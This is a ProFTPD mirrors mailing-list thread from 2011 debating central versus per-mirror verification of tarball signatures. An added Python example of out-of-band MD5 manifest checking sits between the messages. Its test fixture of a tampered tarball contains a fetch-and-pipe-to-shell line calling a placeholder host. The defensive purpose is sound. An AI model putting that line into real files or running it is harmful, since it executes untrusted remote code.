Re: [Proftpd-mirrors] Coming soon: ProFTPD mirror nightly signature verification

2011-01-13 Thread John Morrissey
On Sun, Jan 02, 2011 at 02:52:29AM +0200, Marian Marinov wrote:
> On Sunday 02 January 2011 02:20:13 John Morrissey wrote:
> > On Sat, Jan 01, 2011 at 06:46:26PM -0500, John Morrissey wrote:
> > > Starting on about 12 January, we will be automatically verifying the
> > > PGP and MD5 signatures for current source tarballs (those in
> > > distrib/source) on all mirrors. Based on the count and size of current
> > > releases, this will cause an additional 350-400 gbytes of monthly
> > > traffic for each mirror.
> > 
> > My calculations were way off somehow; this figure should be about
> > *5 to 6* gbytes/month per mirror.
> 
> I'm sorry but, isn't it better to have every mirror calc its MD5 sums
> every day and the main mirror keep the TRUE signatures up to date and
> secure?

We considered this, but if we're trying to detect whether a mirror has been
compromised, what's to keep the attacker from modifying the cron job that
does this signature verification? Also, we'd need to have all 30+ mirrors
agree to run the extra code to do this. Some may not have (or want to have)
the necessary dependencies installed, or may have wildly different versions
available. And we would need to coordinate updates to this (albeit simple)
job when the inevitable changes or bug fixes occur.

I hear your point, but all in all, the best way to achieve this goal is to
have a separate party from the mirror host perform signature verification.

> I'm not a mirror maintainer, but to me, it seems useless to download and
> verify every mirror remotely. I believe that every mirror maintainer will
> agree to put some very basic cron job which will download the current
> signatures and verify all packages from those signatures. And it will be
> quite a bit faster.

Some software ecosystems have built-in signature verification for software
downloads. Debian's APT comes to mind; it verifies a PGP chain of trust to
ensure downloaded files are unmodified. ProFTPD source code downloads aren't
part of a larger ecosystem like that, so we have no way to guarantee that
signature verification happens when a download occurs.

Even though it wasn't a ProFTPD mirror that was compromised, we evaluated
our distribution infrastructure and decided that we should be providing this
assurance since ProFTPD mirrors are official download locations.

john
-- 
John Morrissey   _o/\   __o
j...@proftpd.org   _-< \_  /  \     <  \,
www.proftpd.org/   __(_)/_(_)/\___(_) /_(_)__


___
ProFTPD Mirror Sites List 
https://lists.sourceforge.net/lists/listinfo/proftp-mirrors
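The design John argues for above (a host that is not the mirror fetches the primary site's checksum manifest, fetches each current tarball from the mirror under test, and compares), as an added Python example that is not part of this thread and not ProFTPD's own verification tooling. The manifest format assumed is md5sum(1) output; the file names, tarball contents and the "mirror" dictionary are constructed for the example, and the PGP step (gpg --verify of each tarball's detached signature against the project's key) is deliberately left out because it cannot run offline here.

```python
"""Out-of-band mirror check: trusted manifest from the primary, bytes from
the mirror, comparison done by a third party that the mirror cannot edit.
Added example, not ProFTPD project code; sample data below is constructed.
"""
import hashlib
import re

# md5sum(1) output line: 32 hex digits, then "  name" (text mode) or " *name"
# (binary mode).  Other checksum formats are not handled here (assumption).
_MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{32}) [ *](.+)$")


def parse_md5_manifest(text):
    """Parse an md5sum-style manifest into {filename: expected_hex}.

    Blank lines and '#' comments are skipped.  A malformed line raises
    instead of being ignored: a checker that silently skips garbage can be
    fed garbage and will then report a tampered mirror as clean.
    """
    expected = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _MANIFEST_LINE.match(line)
        if not m:
            raise ValueError("manifest line %d is malformed: %r" % (lineno, raw))
        expected[m.group(2)] = m.group(1).lower()
    return expected


def verify_mirror(expected, fetch, algo="md5"):
    """Compare every manifest entry against what the mirror actually serves.

    `fetch(name)` returns the mirror's bytes for that file, or None when the
    mirror does not serve it (404, timeout).  Returns {name: status} with
    status in {"ok", "mismatch", "missing"}.  `algo` defaults to md5 because
    that is what the thread's manifests use; any hashlib name works.
    """
    results = {}
    for name, want in expected.items():
        data = fetch(name)
        if data is None:
            results[name] = "missing"
            continue
        got = hashlib.new(algo, data).hexdigest()
        results[name] = "ok" if got == want else "mismatch"
    return results


def bad_entries(results):
    """Names that should page the mirror admin, sorted for stable reports."""
    return sorted(name for name, status in results.items() if status != "ok")


# --- constructed sample data (not real ProFTPD releases) --------------------
GOOD_TARBALL = b"pretend this is proftpd-X.Y.Z.tar.gz\n"
TROJANED_TARBALL = GOOD_TARBALL + b"#!/bin/sh\ncurl http://example.invalid | sh\n"

# What the PRIMARY site publishes.  In production this is fetched from the
# primary (over TLS, or PGP-verified), never from the mirror being tested:
# a manifest served by the mirror proves nothing about that mirror.
PRIMARY_MANIFEST = (
    "# constructed md5sum-style manifest\n"
    "%s  proftpd-good.tar.gz\n"
    "%s *proftpd-tampered.tar.gz\n"
    "%s  proftpd-absent.tar.gz\n"
) % (
    hashlib.md5(GOOD_TARBALL).hexdigest(),
    hashlib.md5(GOOD_TARBALL).hexdigest(),
    hashlib.md5(b"release that the mirror never synced").hexdigest(),
)

# What the mirror under test serves; dict.get stands in for an HTTP fetch.
MIRROR_CONTENTS = {
    "proftpd-good.tar.gz": GOOD_TARBALL,
    "proftpd-tampered.tar.gz": TROJANED_TARBALL,   # modified on the mirror
    # "proftpd-absent.tar.gz" is not served at all
}


def check_sample_mirror():
    expected = parse_md5_manifest(PRIMARY_MANIFEST)
    return verify_mirror(expected, MIRROR_CONTENTS.get)


if __name__ == "__main__":
    report = check_sample_mirror()
    for name in sorted(report):
        print("%-28s %s" % (name, report[name]))
    print("needs attention:", bad_entries(report))
```

Two caveats a practitioner would add to this. First, the MD5 comparison only catches a mirror whose copy differs from the primary's; it does not protect against a compromised primary or an MD5 collision, which is why the nightly job in the thread also verifies the PGP signatures, and why the manifest itself must be fetched from the primary rather than from the mirror. Second, the job has to run somewhere the mirror operator cannot reach, otherwise it is the same cron job John describes an attacker simply editing.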


Re: [Proftpd-mirrors] Coming soon: ProFTPD mirror nightly signature verification

2011-01-03 Thread Marian Marinov
On Sunday 02 January 2011 02:20:13 John Morrissey wrote:
> On Sat, Jan 01, 2011 at 06:46:26PM -0500, John Morrissey wrote:
> > Starting on about 12 January, we will be automatically verifying the PGP
> > and MD5 signatures for current source tarballs (those in distrib/source)
> > on all mirrors. Based on the count and size of current releases, this
> > will cause an additional 350-400 gbytes of monthly traffic for each
> > mirror.
> 
> My calculations were way off somehow; this figure should be about
> *5 to 6* gbytes/month per mirror.
> 
> john

I'm sorry but, isn't it better to have every mirror calc its MD5 sums every 
day and the main mirror keep the TRUE signatures up to date and secure?

I'm not a mirror maintainer, but to me, it seems useless to download and 
verify every mirror remotely. I believe that every mirror maintainer will agree 
to put some very basic cron job which will download the current signatures and 
verify all packages from those signatures. And it will be quite a bit faster.

Best regards,
Marian Marinov




Re: [Proftpd-mirrors] Coming soon: ProFTPD mirror nightly signature verification

2011-01-01 Thread John Morrissey
On Sat, Jan 01, 2011 at 06:46:26PM -0500, John Morrissey wrote:
> Starting on about 12 January, we will be automatically verifying the PGP
> and MD5 signatures for current source tarballs (those in distrib/source)
> on all mirrors. Based on the count and size of current releases, this will
> cause an additional 350-400 gbytes of monthly traffic for each mirror.

My calculations were way off somehow; this figure should be about
*5 to 6* gbytes/month per mirror.

john
-- 
John Morrissey   _o/\   __o
j...@proftpd.org   _-< \_  /  \     <  \,
www.proftpd.org/   __(_)/_(_)/\___(_) /_(_)__

